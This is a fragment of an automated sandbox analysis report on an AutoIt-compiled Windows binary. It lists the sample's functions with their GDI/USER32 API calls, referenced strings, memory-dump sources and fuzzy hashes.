                                        • GlobalFree.KERNEL32(00000000), ref: 007CAA38
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007CAA4A
                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007FD9BC,00000000), ref: 007CAA60
                                        • GlobalFree.KERNEL32(00000000), ref: 007CAA70
                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007CAA96
                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007CAAB5
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAAD7
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CACC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 1e74a9d7daf97a96476b32033cf2bed5144500fc7df29b8622ca73d9061d6ab3
                                        • Instruction ID: f7b243b0554a60216f1ef94265fe6d3e8982a75962cdabb0374fdfeae1e27e04
                                        • Opcode Fuzzy Hash: 1e74a9d7daf97a96476b32033cf2bed5144500fc7df29b8622ca73d9061d6ab3
                                        • Instruction Fuzzy Hash: 11026D71A00209EFDB24DF64CD89EAE7BB9FB49355F10811CF905AB2A1D7789D41CB60
                                        Function 007DD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 007DD0EB
                                        • GetSysColorBrush.USER32(0000000F), ref: 007DD11C
                                        • GetSysColor.USER32(0000000F), ref: 007DD128
                                        • SetBkColor.GDI32(?,000000FF), ref: 007DD142
                                        • SelectObject.GDI32(?,00000000), ref: 007DD151
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007DD17C
                                        • GetSysColor.USER32(00000010), ref: 007DD184
                                        • CreateSolidBrush.GDI32(00000000), ref: 007DD18B
                                        • FrameRect.USER32(?,?,00000000), ref: 007DD19A
                                        • DeleteObject.GDI32(00000000), ref: 007DD1A1
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 007DD1EC
                                        • FillRect.USER32(?,?,00000000), ref: 007DD21E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DD249
                                          • Part of subcall function 007DD385: GetSysColor.USER32(00000012), ref: 007DD3BE
                                          • Part of subcall function 007DD385: SetTextColor.GDI32(?,?), ref: 007DD3C2
                                          • Part of subcall function 007DD385: GetSysColorBrush.USER32(0000000F), ref: 007DD3D8
                                          • Part of subcall function 007DD385: GetSysColor.USER32(0000000F), ref: 007DD3E3
                                          • Part of subcall function 007DD385: GetSysColor.USER32(00000011), ref: 007DD400
                                          • Part of subcall function 007DD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DD40E
                                          • Part of subcall function 007DD385: SelectObject.GDI32(?,00000000), ref: 007DD41F
                                          • Part of subcall function 007DD385: SetBkColor.GDI32(?,00000000), ref: 007DD428
                                          • Part of subcall function 007DD385: SelectObject.GDI32(?,?), ref: 007DD435
                                          • Part of subcall function 007DD385: InflateRect.USER32(?,000000FF,000000FF), ref: 007DD454
                                          • Part of subcall function 007DD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DD46B
                                          • Part of subcall function 007DD385: GetWindowLongW.USER32(00000000,000000F0), ref: 007DD480
                                          • Part of subcall function 007DD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DD4A8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 3521893082-0
                                        • Opcode ID: 0b6cf4009b6791b38444a4e9fede7b97bc1d07549d80b05c61d712f7fa08c036
                                        • Instruction ID: 4d1fa2499cd72083cb6f34912ee06c51cd9c0d89a2f8ab20f0fb94d604c14138
                                        • Opcode Fuzzy Hash: 0b6cf4009b6791b38444a4e9fede7b97bc1d07549d80b05c61d712f7fa08c036
                                        • Instruction Fuzzy Hash: EC918D72008305AFDB209F64DC48E6BBBBAFF89321F104A19F962961E0D779DD44CB56
                                        Function 007CA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 007CA42A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007CA4E9
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007CA527
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007CA539
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007CA57F
                                        • GetClientRect.USER32(00000000,?), ref: 007CA58B
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007CA5CF
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007CA5DE
                                        • GetStockObject.GDI32(00000011), ref: 007CA5EE
                                        • SelectObject.GDI32(00000000,00000000), ref: 007CA5F2
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007CA602
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CA60B
                                        • DeleteDC.GDI32(00000000), ref: 007CA614
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007CA642
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 007CA659
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007CA694
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007CA6A8
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 007CA6B9
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007CA6E9
                                        • GetStockObject.GDI32(00000011), ref: 007CA6F4
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007CA6FF
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007CA709
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 72aaa67757939ec7e1a4421d63fce08d0580d537496c71ad283e4230e11e7cae
                                        • Instruction ID: fb686557942789db5f19d608111b6d689e64344099703e3576b063f28cf30d80
                                        • Opcode Fuzzy Hash: 72aaa67757939ec7e1a4421d63fce08d0580d537496c71ad283e4230e11e7cae
                                        • Instruction Fuzzy Hash: 09A14E71A40619BFEB24DBA8DC49FAE7BB9EB44754F008118F614AB2D0D6B4AD40CB64
                                        Function 007BE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BE45E
                                        • GetDriveTypeW.KERNEL32(?,0080DC88,?,\\.\,0080DBF0), ref: 007BE54B
                                        • SetErrorMode.KERNEL32(00000000,0080DC88,?,\\.\,0080DBF0), ref: 007BE6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: c75ec2b87af5a266266ab6c9fe8c89d91e40aa2bf4e449d6efc8029b36039c3a
                                        • Instruction ID: a1b833fdb1bd70f3fd5960479d355d0943023cf903756181d608347e1c2e0e29
                                        • Opcode Fuzzy Hash: c75ec2b87af5a266266ab6c9fe8c89d91e40aa2bf4e449d6efc8029b36039c3a
                                        • Instruction Fuzzy Hash: EF510430208301EBC610DF14D8A9BE9B791FFA4758B51891AF456EB391DB7CDE81DB42
                                        Function 0077C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: a96e470ee1426b7b3d862d6e879e4e13c017c0f65f4427a1be88ba819280686f
                                        • Instruction ID: 752649d484bee9e4062aab4a9536e29d64cecd3f024c88b6ef8738ff7123a0f7
                                        • Opcode Fuzzy Hash: a96e470ee1426b7b3d862d6e879e4e13c017c0f65f4427a1be88ba819280686f
                                        • Instruction Fuzzy Hash: 36610B71240351BBDF26BA649C46FBA339CAF19380F044029FD59E72D2EB5CDE42C6A1
                                        Function 007DC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 007DC598
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007DC64E
                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 007DC669
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 007DC925
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: 0
                                        • API String ID: 2326795674-4108050209
                                        • Opcode ID: 83167812e5265ed1a20b1746ac11fed63d37a43b0e84fd550fc56b0bd7422b88
                                        • Instruction ID: 4204b7a091582ca4577c16fd0235d03b0a179eeaf306c9c548150ef32b6f8d46
                                        • Opcode Fuzzy Hash: 83167812e5265ed1a20b1746ac11fed63d37a43b0e84fd550fc56b0bd7422b88
                                        • Instruction Fuzzy Hash: BDF1D371204302AFE7228F24C889BAABBF5FF89754F18462AF585D63A1C778DC44DB51
                                        Function 007D6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,0080DBF0), ref: 007D6245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 3964851224-45149045
                                        • Opcode ID: c8baacea169de2ec44adfbec4ce3ffefcd4ef9d6cbeece4300daea6764583147
                                        • Instruction ID: d44347321f6845e615ac2b0a6a406ed4225b42001b0af6e01e4d0dc1606548ec
                                        • Opcode Fuzzy Hash: c8baacea169de2ec44adfbec4ce3ffefcd4ef9d6cbeece4300daea6764583147
                                        • Instruction Fuzzy Hash: DCC1A434244201DFCB04FF54D455A6E77E6BF99390F04486AF8869B3A6CB38DD4ACB82
                                        Function 007DD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 007DD3BE
                                        • SetTextColor.GDI32(?,?), ref: 007DD3C2
                                        • GetSysColorBrush.USER32(0000000F), ref: 007DD3D8
                                        • GetSysColor.USER32(0000000F), ref: 007DD3E3
                                        • CreateSolidBrush.GDI32(?), ref: 007DD3E8
                                        • GetSysColor.USER32(00000011), ref: 007DD400
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DD40E
                                        • SelectObject.GDI32(?,00000000), ref: 007DD41F
                                        • SetBkColor.GDI32(?,00000000), ref: 007DD428
                                        • SelectObject.GDI32(?,?), ref: 007DD435
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007DD454
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DD46B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007DD480
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DD4A8
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DD4CF
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 007DD4ED
                                        • DrawFocusRect.USER32(?,?), ref: 007DD4F8
                                        • GetSysColor.USER32(00000011), ref: 007DD506
                                        • SetTextColor.GDI32(?,00000000), ref: 007DD50E
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DD522
                                        • SelectObject.GDI32(?,007DD0B5), ref: 007DD539
                                        • DeleteObject.GDI32(?), ref: 007DD544
                                        • SelectObject.GDI32(?,?), ref: 007DD54A
                                        • DeleteObject.GDI32(?), ref: 007DD54F
                                        • SetTextColor.GDI32(?,?), ref: 007DD555
                                        • SetBkColor.GDI32(?,?), ref: 007DD55F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: d514d6d5c8842de8ca934f0c8ab3835772ac7a0452aa8b77cf7119e6cdb848c7
                                        • Instruction ID: 942589d4feb3185320abe58f261c838c81268f4559061cb3b58f0c71392892be
                                        • Opcode Fuzzy Hash: d514d6d5c8842de8ca934f0c8ab3835772ac7a0452aa8b77cf7119e6cdb848c7
                                        • Instruction Fuzzy Hash: F6511B71900208EFDF209FA8DC48EAE7BBAFB09320F218515F915AB2A1D7799D40DB54
                                        Function 007DB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007DB5C0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007DB5D1
                                        • CharNextW.USER32(0000014E), ref: 007DB600
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007DB641
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007DB657
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007DB668
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007DB685
                                        • SetWindowTextW.USER32(?,0000014E), ref: 007DB6D7
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007DB6ED
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007DB71E
                                        • _memset.LIBCMT ref: 007DB743
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007DB78C
                                        • _memset.LIBCMT ref: 007DB7EB
                                        • SendMessageW.USER32 ref: 007DB815
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007DB86D
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 007DB91A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007DB93C
                                        • GetMenuItemInfoW.USER32(?), ref: 007DB986
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007DB9B3
                                        • DrawMenuBar.USER32(?), ref: 007DB9C2
                                        • SetWindowTextW.USER32(?,0000014E), ref: 007DB9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0
                                        • API String ID: 1073566785-4108050209
                                        • Opcode ID: a175d5b45b9c280cdbe6a7df0946b9f09713d413515a5d286febc9dc3fe9c8aa
                                        • Instruction ID: c6276555145d62572aa6e85d1d653281599a5c9ac4175d3930ccd72e4407b0ef
                                        • Opcode Fuzzy Hash: a175d5b45b9c280cdbe6a7df0946b9f09713d413515a5d286febc9dc3fe9c8aa
                                        • Instruction Fuzzy Hash: C7E18F71900218EBDF209FA1DC88EEE7BB8FF45750F118156F919AB290DB788A51DF60
                                        Function 007D744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 007D7587
                                        • GetDesktopWindow.USER32 ref: 007D759C
                                        • GetWindowRect.USER32(00000000), ref: 007D75A3
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D7605
                                        • DestroyWindow.USER32(?), ref: 007D7631
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D765A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D7678
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D769E
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007D76B3
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D76C6
                                        • IsWindowVisible.USER32(?), ref: 007D76E6
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D7701
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D7715
                                        • GetWindowRect.USER32(?,?), ref: 007D772D
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 007D7753
                                        • GetMonitorInfoW.USER32 ref: 007D776D
                                        • CopyRect.USER32(?,?), ref: 007D7784
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007D77EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: f834b01a300fd9f919047bd3dbe7c987be7f92237aadb75b04e5af60b2d8b886
                                        • Instruction ID: c65b214166bace9e10abf2ab2f9cc2ef19fe1134d888741997e4e8020d540f2e
                                        • Opcode Fuzzy Hash: f834b01a300fd9f919047bd3dbe7c987be7f92237aadb75b04e5af60b2d8b886
                                        • Instruction Fuzzy Hash: D2B17D71608340AFDB14DF64C948A6ABBF5BF88350F00891EF5999B291E778EC05CB56
                                        Function 0078A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0078A839
                                        • GetSystemMetrics.USER32(00000007), ref: 0078A841
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0078A86C
                                        • GetSystemMetrics.USER32(00000008), ref: 0078A874
                                        • GetSystemMetrics.USER32(00000004), ref: 0078A899
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0078A8B6
                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0078A8C6
                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0078A8F9
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0078A90D
